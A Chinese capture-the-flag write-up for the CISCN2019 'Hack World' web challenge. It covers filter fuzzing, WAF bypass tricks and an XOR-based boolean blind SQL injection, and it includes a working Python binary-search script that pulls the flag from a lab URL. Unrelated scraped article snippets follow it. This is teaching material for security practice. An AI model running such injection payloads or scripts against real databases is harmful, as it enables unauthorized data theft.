[CISCN2019 华北赛区 Day2 Web1]Hack World

2023-10-26

1.测试过滤

我想到到了:

  • 联合注入:unin被过滤
  • 报错注入:and、or、updatexml被过滤
  • bool注入和time注入:and、or被过滤
    可以通过fuzz测试(模糊测试),发现哪些字符被过滤了。length为482的,全都是被过滤的。
    在这里插入图片描述然后就在网上学了一些技巧:
    利用/*!union*/可以绕过对union的过滤,虽然这题不能用,但是记一下吧。

2.异或

这东西和那个堆叠注入一样,就见过一次,从此再也没用过,但这次就用到了。用它可以起到代替or的作用。
0^(ascii(substr((select(flag)from(flag)),1,1))>1)
但还有一些是没有用异或,用的是if,可if有局限性,在id为数字型时,可以直接 select * from users where id=if(1=1,1,0),但如果id单引号字符型或双引号字符型,那就必须在if前加or或and。

3.应用

就下来就时很容易的bool注入了。开始前确定注入类型,尝试1’'1查询失败,说明不是单引号,双引号又被过滤了,那就试试字符型,发现可以。但是在构造的过程中,我发现()不给把select和from给括住,如果这样的话,就会报错,不知道为什么?求解!还有就是有人说这东西有waf,不能太快访问,所以要注意脚本的访问节奏。我是访问几次,就不让访问了,所以脚本跑了好几次,每次从上次结束的地方开始。
垃圾二分脚本:

import requests
import time

url = "http://be7c3bbe-f847-4c30-bfbd-baa005a54773.node3.buuoj.cn/index.php"
payload = {
	"id" : ""
}
result = ""
for i in range(1,100):
	l = 33
	r =130
	mid = (l+r)>>1
	while(l<r):
		payload["id"] = "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)
		html = requests.post(url,data=payload)
		print(payload)
		if "Hello" in html.text:
			l = mid+1
		else:
			r = mid
		mid = (l+r)>>1
	if(chr(mid)==" "):
		break
	result = result + chr(mid)
	print(result)
print("flag: " ,result)
本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

[CISCN2019 华北赛区 Day2 Web1]Hack World 的相关文章

  • VulnHub实战篇六:Me And My Girlfriend靶机渗透记录

    0x00靶机信息 下载地址 下载地址 攻击机ip 172 16 12 137 靶机ip 172 16 12 141 目标 getshell 获取两个flag 并提权至root 0x01过程 首先识别一下目标开启的端口和服务 可以看到目标开启
  • 西普部分CTF题目(web)(持续更新)

    1 菊花 题目地址 http www simplexue com ctf examctfdetail 729 点击 我是吊死 进入sim php页面 post参数为id 提示需要net framework 9 9 用burp拦截 修改use
  • CTFshow 信息收集 web 6 7 8 9 10

    目录 第六关 提示 flag 第七关 提示 知识点 flag 第八关 提示 知识点 flag 第九关 提示 知识点 flag 第十关 提示 flag 第六关 提示 解压源码到当前目录 测试正常 收工 这道题考的是备份文件www zip 根据
  • 第十五届全国大学生信息安全竞赛(ciscn初赛) 部分writeup

    杂项的附件地址 https share weiyun com BZyngGSZ CISCN web Ezpop misc everlasting night ez usb 问卷调查 pwn login nomal crypto 签到电台 基
  • CTFSHOW【萌新计划】Writeup

    CTFSHOW 萌新计划 web1 萌新计划 web2 萌新计划 web3 萌新计划 web4 萌新计划 web5 萌新计划 web6 萌新计划 web7 萌新计划 web8 萌新计划 web9 萌新计划 web10 萌新计划 web11
  • ctf.show web入门(信息搜集) 1~20

    目录 web1 源码 web2 源码 web3 抓包 web4 robots web5 index phps web6 解压源码泄露 web7 git泄露 web8 svn泄露 web9 vim缓存 web10 cookie web11 域
  • ctfshow web2

    ctfshow web2 writeup 这是本人第一次写blog 有不好的地方希望大家多多指出 从此开始踏上了网安的不归路 成为了一只web狗 从题目可以看出这是一道sql注入的题 示例 pandas 是基于NumPy 的一种工具 该工具
  • [羊城杯 2020]A Piece Of Java

    羊城杯 2020 A Piece Of Java 文章目录 羊城杯 2020 A Piece Of Java 源码分析 从后往前测试 逐步写exp 构造DatabaseInfo类对象 InfoInvocationHandler 动态代理 序
  • MATRIX: 1 ctf challenge

    MATRIX 1 About Release Back to the Top Name Matrix 1 Date release 19 Aug 2018 Author Ajay Verma Series Matrix Download B
  • ctfshow_web149

    打开容器
  • 攻防世界Web题 - unseping 总结

    攻防世界Web题 unseping 总结 1 审题 进入题目 可以看出来是典型的php反序列化题目 2 源代码分析
  • [CTF/网络安全] 攻防世界 disabled_button 解题详析

    CTF 网络安全 攻防世界 disabled button 解题详析 input标签 姿势 disable属性 总结 题目描述 X老师今天上课讲了前端知识 然后给了大家一个不能按的按钮 小宁惊奇地发现这个按钮按不下去 到底怎么才能按下去呢
  • BUUCTF:[GXYCTF2019]BabyUpload1

    文件上传漏洞 不过这里我要吐槽一下 这个题首先他不允许传 png文件 再者 jpg文件不能大 打了也报错 传不上去 可想而知 我当时在做这个题的时候跟见了鬼一样难受 什么文件都传不了 接着做题吧 试着传一个PHP文件 告诉我不能传ph开头的
  • 网络安全实验室CTF练习部分题目(持续更新)

    1 脚本关 微笑一下 过关地址 http lab1 xseclab com base13 ead1b12e47ec7cc5390303831b779d47 index php 查看源代码 include flag php smile 1 i
  • php伪随机数

    目录 函数介绍 代码测试 考点 1 根据种子预测随机数 2 根据随机数预测种子 函数介绍 mt srand 播种 Mersenne Twister 随机数生成器 mt rand 生成随机数 简单来说mt srand 通过分发seed种子 然
  • XCTF攻防世界Web12道简单题

    0x00 准备 内容 在xctf官网注册账号 即可食用 目录 目录 0x01 view source2 0x02 get post3 0x03 robots4 0x04 backup6 0x05 Cookie7 0x06 disabled
  • NEZUKO: 1——202201152003

    NEZUKO 1 202201152003 About Release Back to the Top Name nezuko 1 Date release 21 Aug 2019 Author yunaranyancat Series n
  • web做题记录(buuoj,jarvis,攻防世界,bugku,hackme)

    web做题笔记 文章目录 web做题笔记 buuoj easy tornado 随便注 warmup easysql 高明的黑客 jarvisoj re flag在管理员手上 api调用 chopper 图片上传漏洞 inject web
  • Bugku题目Reverse逆向部分wp(持续更新)

    目录 入门逆向 Easy Re 游戏过关 sign in Easy vb Next 入门逆向 题目链接 丢入DIE PEID看过 没有壳 32位 直接IDA 汇编代码直接看到 flag Re 1s S0 C0OL Easy Re 题目链接
  • Python从内存中运行exe[重复]

    这个问题在这里已经有答案了 exe requests get url content run exe subprocess run exe shell True stdout subprocess PIPE stderr subproces

随机推荐

  • html视频倍速播放,如何让网页视频倍速播放

    Video Speed Controller 是一款倍速播放视频的浏览器插件 现在网站上播放的视频 基本上都可以实现倍速播放 但偶尔也有些网站上的视频 没有倍速播放功能 有时候看一些没有倍速播放功能的视频 确实比较难受或有点不耐烦 有没有一
  • Android 进阶解密:根 Activity 启动过程

    一 根 Activity 启动过程 可以分为三个部分 Launcher 请求 AMS 过程 AMS 到 ApplicationThread 的调用过程 ActivityThread 启动 Activity 二 Launcher 启动 AMS
  • zynq emio 外接emmc/SD 相关问题与描述总结

    在使用emio的情况要注意 由于通过PL的扩展 导致一些问题 如时钟时序 数据 cmd的方向控制都需要注意 A emio的clk和clk fb要短接 原因是要通过反馈修复clk输出时序 可通过内部直接短接 该处理方式有一定风险 反馈距离过短
  • centos7Nginx通过反向代理设置https配置多端口访问

    Https server配置 96 HTTPS server 97 98 server 99 listen 80 100 listen 443 ssl 101 server name www lidengxxxx top 102 103 s
  • c++仿函数 functor

    内容整理自国外C 教材 先考虑一个简单的例子 假设有一个vector
  • 使用IntelliJ IDEA2018创建并发布一个简单JavaWeb项目

    使用IntelliJ IDEA2018创建并发布一个JavaWeb项目 新建Web项目 Fill New Project 进入创建项目窗口 Java Enterprise 勾选Web Application next 设置项目名及项目路径
  • glsl vscode写_学会用好 Visual Studio Code

    Visual Studio Code是个牛逼的编辑器 启动非常快 完全可以用来代替其他文本文件编辑工具 又可以用来做开发 支持各种语言 相比其他IDE 轻量级完全可配置还集成Git感觉非常的适合前端开发 是微软亲生的想必TypeScript
  • 13个超强的 SpringBoot 实战项目 (还不赶紧收藏起来)

    在GItHub和Gitee上找了一些超好的Spring boot项目 如果大家觉得不错 可以顺手给这些项目点个小星星 一 云收藏 云收藏是一个使用 Spring Boot 构建的开源网站 可以让用户在线随时随地收藏的一个网站 在网站上分类整
  • java使用WebSocket实现一对一实时对话

    最近的项目中有实时对话的需求 这里也是查阅了很多的资料 使用webSocket实现一对一对话是最多的 链接 https pan baidu com s 1Vn1e1qw7nRnU1 4R 4fcGg 提取码 qwer 逻辑讲解 现在我们要给
  • Linux下protobuf的简单使用

    1 创建proto文件 touch test proto 2 往proto文件添加内容 syntax proto3 message Person string name 1 int32 age 18 第一行表示使用proto3语法进行编译
  • 【CUDA入门笔记】CUDA内核与线程配置

    1 CUDA核函数 在GPU上调用的函数成为CUDA核函数 Kernel function 核函数会被GPU上的多个线程执行 每个线程都会执行核函数里的代码 当然由于线程编号的不同 执行的代码路径可能会有所不同 1 函数的最前面是声明标识符
  • Qt进程和线程之一:运行一个进程和进程间通信

    Qt提供了一个与平台无关的QProcess类 用以对进程的支持 本节讲述了怎样在Qt应用程序中启动一个外部程序进程 以及几种常用的进程间通信方法 设计应用程序时 有时不希望将一个不太相关的功能集成到程序中 或者是因为该功能与当前设计的应用程
  • pinia简介和setup语法糖

    pinia简介和setup语法糖 1 pinia的基本特点 pinia同样是一个Vue 状态管理工具 它和vuex有很多相似的地方 本质上他是vuex团队核心成员开发的 在vuex上面提出了一些改进 与vuex相比 pinia去除了vuex
  • Linux的Shell变量、环境变量、代理设置

    Linux的Shell变量 环境变量 代理设置 引言 一 shell与shell变量 环境变量 1 1 概念 1 2 作用域 1 3 SSH 连接 Linux 服务器的环境变量处理流程 1 4 环境变量文件 二 变量增删改查 2 1 查看变
  • 金融tag对照表

    tag 说明 格式 长度 值 描述 4F 应用标识符 AID b 注册应用提供商标识 RID 和专用标识符扩展 A000000333010101A000000333确定UICS注册应用提供商 所有的卡片都一样 010101表明UICS借记应
  • Axios post请求

    1 常见post请求种类 1 form表单提交 method post 是同步的 要素 页面是否刷新 2 axios post 异步操作 1 1axios post请求入门案例 1 1 1编辑前端JS h1 Axios测试案例 2 h1
  • MySQL——使用mysqldump命令备份

    使用mysqldump命令备份 mysqldump命令可以将数据库中的数据备份成一个文本文件 表的结构和表中的数据将存储在生成的文本文件中 本节将介绍mysqldump命令的工作原理和使用方法 mysqldump命令的工作原理很简单 它先查
  • java基础面试题系列(81-90)

    请你说明ConcurrentHashMap有什么优势 1 7和1 8有什么区别 参考链接 https www cnblogs com like minded p 6805301 html 请你说明一下TreeMap的底层结构 TreeMap
  • 第十篇 -- Windows 下免费的GIF录制工具

    网址 https blog csdn net u013019701 article details 80550411 本人用的第二个 亲测好用 转载于 https www cnblogs com smart zihan p 11461101
  • [CISCN2019 华北赛区 Day2 Web1]Hack World

    1 测试过滤 我想到到了 联合注入 unin被过滤 报错注入 and or updatexml被过滤 bool注入和time注入 and or被过滤 可以通过fuzz测试 模糊测试 发现哪些字符被过滤了 length为482的 全都是被过滤